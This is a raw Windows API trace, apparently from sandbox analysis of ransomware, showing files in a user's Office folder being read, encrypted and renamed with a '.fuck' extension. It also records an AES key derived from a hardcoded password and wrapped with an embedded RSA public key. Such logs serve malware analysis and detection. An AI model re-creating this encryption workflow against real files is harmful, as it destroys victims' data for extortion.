[0268.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.927] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.927] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.928] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.928] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.929] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.929] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.930] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.930] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.931] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.931] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.932] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.932] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x33b, lpOverlapped=0x0) returned 1 [0268.933] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x33b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x340) returned 1 [0268.933] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x340, lpOverlapped=0x0) returned 1 [0268.933] CloseHandle (hObject=0x5d3c) returned 1 [0268.933] CloseHandle (hObject=0x5d48) returned 1 [0268.933] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), bFailIfExists=0) returned 1 [0268.937] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0268.938] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml.gsg")) returned 1 [0268.940] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officec2rclient.exe_rules.xml.fuck")) returned 1 [0268.941] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0268.941] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0268.941] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.941] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.941] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.941] GetLastError () returned 0x0 [0268.941] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml")) returned 0x20 [0268.942] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.942] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.943] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\officeclicktorun.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.945] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.947] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.947] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0268.947] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.947] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.947] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.947] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.947] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26340) returned 1 [0268.948] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26340, dwCertEncodingType=0x1, pInfo=0x2f307c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f307f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f307f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa8c8) returned 1 [0268.948] CryptEncrypt (in: hKey=0x2fa8c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.948] CryptEncrypt (in: hKey=0x2fa8c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f265e8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f265e8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.948] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f265e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f265e8*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.949] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.972] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 